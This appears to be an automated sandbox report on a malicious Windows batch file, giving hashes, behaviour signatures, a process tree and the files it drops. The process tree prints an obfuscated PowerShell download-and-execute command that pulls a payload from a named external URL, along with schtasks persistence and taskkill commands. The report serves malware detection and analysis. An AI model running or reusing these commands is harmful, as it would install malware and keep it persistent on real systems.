Analysis

  • max time kernel
    111s
  • max time network
    41s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    08-10-2022 08:19

General

  • Target

    OutPut2.bat

  • Size

    21KB

  • MD5

    c32b1f1bb8eda7a1e148c1cdf014f23b

  • SHA1

    af0cc28285fc57632751f970ba3040bb1af2faa0

  • SHA256

    8a0dc53293a9c974b1884f315f724024713523a6cc95e5bb4abee5fdaf79a9b6

  • SHA512

    f7d04d94d7dbabcf7aff4493745660efd65321c2d3e1c2a5c2fea4d02ecbcf90d77e322ef13d257ae263aadbd4cab6a4f237b349b8be0e3e30e3e31f6732980e

  • SSDEEP

    96:VMzFOMzFJMzFLMzFeMzFzMzFJMzFTMzFiMzFJMzFLMzFUHQeMzFLMzF2MzFqMzFN:OVqYFQqwxqYgQFYNpdiohUPOzfXwQ9j

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\OutPut2.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1968
    • C:\Windows\system32\cmd.exe
      CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81='IEX(NEW-OBJECT NET.W';$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450='EBCLIENT).DOWNLO';[BYTE[]];$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E='E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9(''https://pbc.kz/wp-admin/bb.jpg'')'.REPLACE('E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9','ADSTRING');[BYTE[]];IEX($8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81+$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450+$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E)
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1976
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81='IEX(NEW-OBJECT NET.W';$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450='EBCLIENT).DOWNLO';[BYTE[]];$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E='E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9(''https://pbc.kz/wp-admin/bb.jpg'')'.REPLACE('E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9','ADSTRING');[BYTE[]];IEX($8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81+$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450+$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E)
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:892
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\ProgramData\App\xx.vbs"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1760
          • C:\Windows\System32\cmd.exe
            cmd /c ""C:\ProgramData\App\xx.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:336
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn App /sc minute /mo 5 /tr "C:\ProgramData\App\cAppc.vbs"
              6⤵
              • Creates scheduled task(s)
              PID:1592
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn det /sc minute /mo 1 /tr "C:\ProgramData\App\cAppc.vbs"
              6⤵
              • Creates scheduled task(s)
              PID:748
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM schtasks.exe /T
              6⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1372
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM powershell.exe /T
              6⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1044
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM cmd.exe /T
              6⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1556
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {515C3CF8-F8FC-427E-A2C1-E72B29CB7999} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:808
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\ProgramData\App\cAppc.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1720
      • C:\Windows\System32\cmd.exe
        cmd /c ""C:\ProgramData\App\cAppc.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1724
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\App\App.PS1
          4⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1376
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\ProgramData\App\cAppc.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:604
      • C:\Windows\System32\cmd.exe
        cmd /c ""C:\ProgramData\App\cAppc.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1436
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\App\App.PS1
          4⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1188

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\App\App.PS1

    Filesize

    264KB

    MD5

    b385ec653fef60833ca284dcfff71bff

    SHA1

    612981ecf896a7ef09496894d8059f6a9570cf2a

    SHA256

    76a4b8b505e22defbbd1ba2b577bafe4c4311d2d329f3d29cf3e804a7dd191e8

    SHA512

    00f9155acd9aa8fb82c051fb4a27ee5e5b35229f69e0a20525dbcd85c2bf74025b7cc5608e1680683c4959ebfb4ad90811e006bed63e66acd6f1755005c9ba81

  • C:\ProgramData\App\cAppc.bat

    Filesize

    81B

    MD5

    6d2d36c3cc7bea993801e5febf7db1c8

    SHA1

    962ca57c247334f79d40e55aa30612c5dfe96c12

    SHA256

    83c47147832482038f4ac9867d5b16ccb78640d9b39d0860805b25db86609a68

    SHA512

    751d5f167617c427697343895988e5b036eff7ee8c358ba35d764378a928b813ee798b5c2e0f67a8dac4622fd5c61708ab0823f9f1498e7d07db4bfe9f466c5d

  • C:\ProgramData\App\cAppc.vbs

    Filesize

    5KB

    MD5

    5392a92ca835d8812a79a1ee6dac0892

    SHA1

    cb56f654f054542c538f492c4d437d65e4f9bba7

    SHA256

    4ab24fc3a3b34b6b7b57d5fbffba6831ed4c7a9c5c31bfd97aeb603d6bd5f2c5

    SHA512

    02175ebd71040d878818dadb2dda855ddc9a43b1dcd625c1943bedc09b3cba48e4debd7b2401025bc992c0ca38dc96e3f2746fe1518808290c2b07132470829d

  • C:\ProgramData\App\xx.bat

    Filesize

    260B

    MD5

    15b09a88be68cc160232d8766f7e3be7

    SHA1

    b3468aaafd099c639405574b719a201b8df00b02

    SHA256

    d7128567b26c84039b6fd667ab0d1a443dbbdf15e0550a26e015cbab95979ae2

    SHA512

    0cd81076a2242363bd692b12287ac31e35332b272bd1ded78d9dbd55cee3c8947cce3f45cc4b24bb6c303032d2dfb6efe87edff49fa242b4013e56eaa1cd0460

  • C:\ProgramData\App\xx.vbs

    Filesize

    4KB

    MD5

    1de9b452f5231a8281209d61a101bcb5

    SHA1

    27ea6c5470a58226b7a1ab8986d3d0bec87ae3eb

    SHA256

    0920a4adad558df5820ab49ab8566d9dbea771da520a754c2652fa5548852f64

    SHA512

    e22f70de118f0b6b53e1277ee1c07f30e9d7356db36d858025725b1b0ee2cd677ac926fcb5587243fb342ef7fcff498a68eb6d8ebef3497b5c450468f0d7c4ec

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    730429ada915bc92547b959c4a1bb3fc

    SHA1

    5829c66b1a067b46638f4a058f01561f860b5a94

    SHA256

    c5b7fcc658f45b88f636cc5ba5ae9fcd7d3014892ae7f6148e2089314a759281

    SHA512

    f2305c5e323ac948d552f33a12552c8c10cfafaecf7730c7a5acce578ffd6c32c4913543bd4e40cdc31a45ce54b393a46c22f183cd4553d32971109bfc6ee7f8

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    dd66478cab07d8ff579e3588808ff6a2

    SHA1

    d7685c2f9e5356ed17f237d5069395ada52c25f2

    SHA256

    caff4b2741f414e6e0bfbe7814d9a36518401a54eaed19ac133a8a69b5ff27fa

    SHA512

    87730479ebccfd54277293c78ff66a49686037fbb7d9d60a756253b6950fc398237c56e754fe8dfc47786e2a9b14cb50d44ff8e1bc7063bec9f09bd2db98578e

  • memory/892-63-0x000000000209B000-0x00000000020BA000-memory.dmp

    Filesize

    124KB

  • memory/892-59-0x0000000002094000-0x0000000002097000-memory.dmp

    Filesize

    12KB

  • memory/892-56-0x000007FEFBE81000-0x000007FEFBE83000-memory.dmp

    Filesize

    8KB

  • memory/892-57-0x000007FEF3B00000-0x000007FEF4523000-memory.dmp

    Filesize

    10.1MB

  • memory/892-62-0x0000000002094000-0x0000000002097000-memory.dmp

    Filesize

    12KB

  • memory/892-65-0x000000000209B000-0x00000000020BA000-memory.dmp

    Filesize

    124KB

  • memory/892-61-0x000000000209B000-0x00000000020BA000-memory.dmp

    Filesize

    124KB

  • memory/892-60-0x000000001B880000-0x000000001BB7F000-memory.dmp

    Filesize

    3.0MB

  • memory/892-58-0x000007FEF2FA0000-0x000007FEF3AFD000-memory.dmp

    Filesize

    11.4MB

  • memory/1188-96-0x000007FEF44A0000-0x000007FEF4EC3000-memory.dmp

    Filesize

    10.1MB

  • memory/1188-98-0x0000000002564000-0x0000000002567000-memory.dmp

    Filesize

    12KB

  • memory/1188-99-0x000000001B700000-0x000000001B9FF000-memory.dmp

    Filesize

    3.0MB

  • memory/1188-97-0x000007FEF3940000-0x000007FEF449D000-memory.dmp

    Filesize

    11.4MB

  • memory/1188-100-0x0000000002564000-0x0000000002567000-memory.dmp

    Filesize

    12KB

  • memory/1188-101-0x000000000256B000-0x000000000258A000-memory.dmp

    Filesize

    124KB

  • memory/1376-84-0x000007FEF42A0000-0x000007FEF4CC3000-memory.dmp

    Filesize

    10.1MB

  • memory/1376-88-0x0000000002564000-0x0000000002567000-memory.dmp

    Filesize

    12KB

  • memory/1376-89-0x000000000256B000-0x000000000258A000-memory.dmp

    Filesize

    124KB

  • memory/1376-86-0x0000000002564000-0x0000000002567000-memory.dmp

    Filesize

    12KB

  • memory/1376-85-0x000007FEF3740000-0x000007FEF429D000-memory.dmp

    Filesize

    11.4MB